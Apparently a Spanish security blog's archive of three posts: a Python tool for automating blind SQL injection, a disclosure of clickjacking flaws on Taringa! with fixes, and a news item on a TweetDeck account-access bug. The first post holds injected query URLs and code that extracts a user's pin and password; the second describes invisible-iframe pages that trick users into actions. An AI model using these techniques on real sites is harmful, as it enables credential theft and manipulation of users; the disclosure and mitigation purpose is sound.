vulnerabilidad

Todas las entradas etiquetadas como vulnerabilidad

BlindSQLer: acelerando ataques de Blind SQL Injection

Publicado por sh4r3m4n el 11 enero, 2013
Publicado en: Hacking General, Programación, Red remota, Redes, Redes, Seguridad. Etiquetado: , , , , , , , . Deja un comentario

Tener una vulnerabilidad de Blind SQL Injection en un sitio o aplicación es algo bastante grave, y su explotación puede traer severas consecuencias. Esta vulnerabilidad se caracteriza por tener un resultado binario, es decir, verdadero o falso. Si queremos averiguar el valor de algún número grande o de una cadena de texto necesitaremos hacer una gran cantidad de peticiones al servidor, y realizar esto manualmente puede resultar bastante tedioso.

Las herramientas que automatizan el proceso no me convencieron para nada: hacen todo automático prácticamente sin intervención del usuario, y suelen fallar repetidamente. Es por esto que desarrollé una herramienta extremadamente sencilla pero bastante útil: BlinsSQLer permite, programando un poco de Python, adivinar el valor de una expresión SQL, aprovechando la vulnerabilidad Blind SQL Injection.

Supongamos que la vulnerabilidad esta presente en http://localhost/profile.php?uid=XXX. Cada usuario tiene un nombre, un pin (número) y un password. Supongamos que queremos averiguar el pin del usuario con uid 5, tendríamos que hacer un montón de consultas:

http://localhost/profile.php?uid=5 and pin>5000
http://localhost/profile.php?uid=5 and pin>2500
http://localhost/profile.php?uid=5 and pin>3250

Y ni hablar de hacerlo para cadenas de texto, ya que esto hay que hacerlo para cada caracter.

A continuación muestro la forma de hacerlo con BlindSQLer, programando unas pocas líneas de código y usando la librería:

  1. import blindsqler
  2. from urllib import urlopen, urlencode
  4. class Localhost(blindsqler.QueryHandler):
  5.         «»» El manejador de querys de un server de prueba «»»
  6.         def __init__(self, uid, field):
  7.                 self.uid = uid # El ID del usuario
  8.                 self.field = field # El campo cuyo valor se quiere adivinar
  9.         def query(self, data):
  10.                 url = «http://localhost/profile.php»
  11.                 q = «%s AND %s %s» % (self.uid, self.field, data)
  12.                 url = url + ‘?’ + urlencode(dict(id=q))
  13.                 pag = urlopen(url).read()
  14.                 if «No hay resultados» in pag:
  15.                         return False
  16.                 else:
  17.                         return True
  19. localhost_pin = Localhost(5,’pin’) # El campo pin del usuario con UID 5
  20. pin = blindsqler.adivinaint(localhost_pin, [0,65535]) # Suponiendo que el valor máximo del pin sea 65535
  22. localhost_pass = Localhost(5,’password’) # El campo password del usuario con UID 5
  23. pass = blindsqler.adivinastr(localhost_pass, length=30, mssql=False) # La máxima longitud sería 30, y le decimos que no usamos Microft SQL Server. Estos argumentos son opcionales

Script en pastebin: http://pastebin.com/G7FDDN3Z#

Como vemos, es necesario programar un poco para hacerlo funcionar, y es necesario hacerlo en Python. Igualmente considero esto más sencillo que probar a mano o que usar herramientas tipo SQLMap que pretenden hacer todo el trabajo.

Descarga: https://github.com/sh4r3m4n/blindsqler

Espero que les haya sido útil y que les traiga buenos resultados. Saludos!

Múltiples vulnerabilidades de Clickjacking en Taringa!

Publicado por sh4r3m4n el 3 agosto, 2012
Publicado en: Client-Side, Hacking General, Seguridad, Web. Etiquetado: , , , , , , . Deja un comentario

Supongo que la mayoría de mis lectores conocerán el sitio Taringa!. Para los que no, Taringa es una web donde los usuarios comparten «posts» de diverso contenido, y estos son valorados en forma de puntos:

Investigando un poco me di cuenta que todo el sitio no tiene una protección para ataques de clickjacking. El clickjacking esuna técnica relativamente nueva, en la que el atacante crea una página con un iframe invisible, y un botón sencillo. Al hacerle click al botón, en realidad se le está haciendo click al iframe, y se puede engañar al usuario para que clickee donde no debería. Si no se entiende bien, se puede ver en los ejemplos que publico más adelante.

Los ejemplos pueden ser vistos en mi sitio web alternativo, o descargados en este link para ser descomprimidos y abiertos con un navegador (no es necesario un servidor Web).

Engañando al usuario para que nos siga

El siguiente ataque es el más sencillo de los tres. El usuario debe entrar a una página malintencionada como esta y, al hacer click en el botón OK estaría siguiendo al usuario indicado en el código fuente del HTML (en este caso, jorgepastor66):

Engañando al usuario para que shoutee lo que queramos

Otra posibilidad del uso del Clickjacking en Taringa! es mediante los shouts, una mezcla entre un tweet y un estado de Facebook. Estos shouts pueden ser vistos por los seguidores del usuario que shoutea.

Taringa! tiene una URL donde es posible crear un shout con contenido personalizado, y que el usuario shoutee eso al clickear en el botón de compartir. Ejemplo: http://www.taringa.net/widgets/share.php?url=https://licenciaparahackear.wordpress.com&body=El+mejor+blog+de+informatica+@mal97

Lo que se hace ahora es, en la página maliciosa, crear un iframe invisible a esta página y un botón estratégicamente ubicado en el lugar donde está el botón de compartir. Todo esto ya está hecho en el archivo shouclickhack.html del archivo mencionado aneriormente o en este link.

Cuando el usuario hace click está shouteando lo que nosotros queremos, probablemente sin darse cuenta debido a la invisibilidad del marco:

Engañando al usuario para que nos deje puntos

Creo que este es el mejor ataque posible, ya que lo que todo usuario de Taringa! desea son puntos. El iframe en este caso tiene como contenido un post cualquiera de Taringa! al que el usuario inconscientemente le deja puntos. En la URL al post, se incluye al final el marcador #post-data-stats que nos muestra el sector de la página donde se dan puntos. Es recomendable que el post tenga algunos comentarios para funcionar en algunos navegadores correctamente.

Como cada usuario tiene una cantidad diferente de puntos, que van de 1 a 10 para dar en un mismo post, necesitamos, por medio de ingeniería social, por ejemplo, saber cuántos puntos puede dar este usuario. Al saberlo, a la URL malintencionada(pointsclickjack.html o http://sh4r3m4n.webcindario.com/taringa/pointsclickjack.html) se le agrega ?puntos=X al final, siendo X la cantidad de puntos que el usuario puede dar.

En el siguiente video le damos puntos sin saberlo a un TOP Post. Elegí este porque tiene bastantes comentarios y es medio crap, por lo que carga bastante rápido:

Posibles soluciones al problema

Realmente es muy sencillo solucionar esta importante vulnerabilidad, con simplemente modificar los headers de las páginas que no queremos que puedan estar incluidas dentro de un iframe.

También es posible, en vez de modificar los headers, usar una etiqueta meta en la cabecera del código fuente, aunque no es compatible con todos los navagadores.

Modificando headers

Al incluir esta línea en el archivo PHP de la página que queremos arreglar el ataque es mucho menos eficiente, por no decir nulo:

<?php header(‘x-frame-options: deny’) ?>

PD: Esta línea debe estar incluida al principio del PHP

Usando etiqueta meta

Esta técnica no es compatible con todos los navegadores, por lo que es recomendable la anterior. En la cabecera del HTML, debemos incluir la siguiente línea:

<META http-equiv=»X-Frame-Options» content=»Deny» />


Saludos!

Miles de usuarios quedaron sin TweetDeck por un error

Publicado por sh4r3m4n el 2 abril, 2012
Publicado en: Noticias. Etiquetado: , , , . Deja un comentario

Un cliente descubrió una falla de programación. Podía acceder a cientos de otras cuentas de Twitter.

 INGRESO NEGATIVO. Durante la tarde el servicio de cliente de Twitter estuvo desactivado. CAPTURA DE PANTALLA
INGRESO NEGATIVO. Durante la tarde el servicio de cliente de Twitter estuvo desactivado.

Debido a un error de programación, Twitter apagó el popular servicio de clientes TweetDeck. La medida se tomó luego de que Geoff Evason, un usuario de Sidney, asegurara que podía acceder a cientos de otras cuentas a través del servicio, informó el sitio «Enter.co».

«Soy un usuario de TweetDeck. Un error me ha dado acceso a cientos de cuentas de Twitter y Facebook. Yo no he hecho nada especial para hacer que esto suceda. Simplemente inicié sesión un día, la cuenta se puso más lenta de lo normal y pude publicar por medio de las cuentas de muchos más», dijo Evason al sitio «TechCrunch» mediante un correo electrónico.

A través de la cuenta de Twitter de la aplicación, la compañía dio a conocer a los usuarios la noticia del error de programación de Tweetdeck y la caída del servicio. «TweetDeck actualmente está fuera de servicio mientras solucionamos un problema. Pedimos disculpas por las molestias».

Evanson también dio a conocer el inconveniente a través de su perfil y le ofreció su total apoyo a la red de microblogging para poder identificar el problema. «Si desean más detalles sobre mi cuenta o cómo me encontré con ese error de acceso, pueden enviarme un mensaje directo. Me encantaría que el servicio volviera pronto», comentó. (Enter.co-Especial)